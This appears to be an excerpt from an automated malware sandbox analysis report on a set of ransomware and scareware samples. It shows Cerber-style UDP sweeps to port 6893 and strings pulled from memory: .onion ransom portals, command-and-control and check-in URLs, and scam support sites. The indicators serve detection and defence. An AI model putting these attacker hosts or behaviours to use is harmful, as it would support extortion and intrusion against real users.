        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.250:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.251:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.252:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.253:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.254:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.176.255:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.0:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.1:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.2:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.3:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.4:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.5:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.6:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.7:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.8:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.9:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.10:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.11:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.12:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.13:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.14:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.15:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.16:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.17:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.18:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.19:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.20:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.21:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.22:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.23:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.24:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.25:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.26:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.27:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.29:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.28:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.30:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.31:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.32:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.33:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.34:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.35:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.36:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.37:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.38:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.39:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.40:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.41:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.42:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.43:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.44:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.45:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.46:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.47:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.48:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.49:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.50:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.51:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.52:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.53:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.54:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.55:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.56:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.57:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.58:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.59:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.61:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.60:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.62:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.63:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.64:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.65:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.66:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.67:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.68:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.69:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.70:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.71:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.72:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.73:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.74:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.75:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.76:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.77:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.78:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.79:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.80:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.81:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.82:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.83:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.84:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.85:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.86:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.87:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.88:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.89:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.90:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.91:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.93:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.94:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.92:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.95:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.96:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.97:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.99:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.98:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.100:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.101:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.102:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.103:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.104:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.105:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.106:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.107:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.108:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.109:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.110:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.111:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.112:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.113:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.114:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.115:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.116:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.117:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.118:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.119:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.120:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.121:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.122:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.123:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.124:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.125:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.126:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.127:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.128:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.129:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.130:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.131:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.132:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.133:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.134:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.135:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.136:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.137:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.138:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.139:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.140:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.141:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.142:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.143:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.144:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.145:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.146:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.147:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.148:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.149:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.150:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.151:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.152:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.153:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.154:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.155:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.156:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.157:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.158:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.159:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.160:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.161:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.162:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.163:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.164:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.165:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.166:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.167:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.168:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.169:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.170:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.171:6893
        Source: global trafficUDP traffic: 192.168.2.3:65523 -> 87.98.177.172:6893
        Source: rundll32.exe, 0000000C.00000002.344990142.00000000030BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344817594.00000000030AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.347563949.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/(i
        Source: rundll32.exe, 0000000C.00000002.344817594.00000000030AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/d
        Source: rundll32.exe, 0000000C.00000002.347563949.0000000004AF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/ic
        Source: rundll32.exe, 0000000C.00000002.344817594.00000000030AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/n
        Source: Endermanch@NoMoreRansom.exe, 00000027.00000002.597891270.00000000005BB000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://a4ad4ip2xzclh6fd.onionreg.phpprog.phperr.phpcmd.phpsys.phpshd.php?&v=b=i=k=ss=e=c=f=si=sh=shb
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.609368050.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arizonacode.bplaced.net
        Source: Endermanch@DeriaLock.exe, 00000013.00000000.310989196.0000000000356000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
        Source: Endermanch@DeriaLock.exe, 00000013.00000000.310989196.0000000000356000.00000002.00000001.01000000.0000000C.sdmp, Endermanch@DeriaLock.exe, 00000013.00000002.609368050.00000000025E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000000.310989196.0000000000356000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
        Source: Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://arizonacode.bplaced.net4
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Error file remover.msi.57.drString found in binary or memory: http://collect.installeranalytics.com7
        Source: Fantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://content.screencast.com/users/Gurudrag/folders/Default/media/9289aabe-7b4a-4c7f-b3bb-bdf3407e7
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
        Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
        Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
        Source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: rundll32.exe, 0000000C.00000003.314263722.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000024.00000000.331143683.000000000127E000.00000002.00000001.01000000.00000013.sdmp, dispci.exe.12.drString found in binary or memory: http://diskcryptor.net/
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.dr, Endermanch@Cerber5.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmp, DR012.47.drString found in binary or memory: http://petya37h5tbhyvki.onion/6zoerS
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmp, DR012.47.drString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.527771418.000000000019C000.00000004.00000010.00020000.00000000.sdmp, DR012.47.drString found in binary or memory: http://petya5koahtsf7sv.onion/6zoerS31PksHipkSD3wnxFfPXFrCQLNKvSQZcDbeDNyeQFrqmAHjQ8Yk2cHrzL89WzNXpC
        Source: Endermanch@Petya.A.exe, 0000002F.00000002.535981944.000000000041B000.00000040.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL
        Source: Endermanch@Krotten.exe.0.drString found in binary or memory: http://poetry.rotten.com/lightning/
        Source: Fantom.exe, 00000015.00000002.623940845.0000000002520000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://powertoolsforyou.com
        Source: Fantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://powertoolsforyou.com/themes/prestashop/cache/stats.php
        Source: Fantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://powertoolsforyou.com/themes/prestashop/cache/stats.phpthttp://templatesupdates.dlinkddns.com/
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crl0W
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crt0
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcd.com0&
        Source: fatalerror.exe.57.drString found in binary or memory: http://recoverpcerror.com/ar/5430.htmlJhttp://itsupport24by7.com/online.htmlVBA6.DLL__vbaObjSet__vba
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmp, Endermanch@DeriaLock.exe, 00000013.00000002.609368050.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Fantom.exe, 00000015.00000002.623940845.0000000002520000.00000004.00000800.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0W
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://t2.symcb.com0
        Source: Fantom.exe, 00000015.00000002.614533949.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://templatesupdates.dlinkddns.com/falssk/fksgieksi.php
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://tl.symcd.com0&
        Source: rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Endermanch@InfinityCrypt.exe, 0000001D.00000002.604216725.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
        Source: rundll32.exe, 0000000C.00000003.327238742.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.304582247.000000000305C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000003.314915403.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.344517005.0000000003073000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000C.00000002.342821374.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
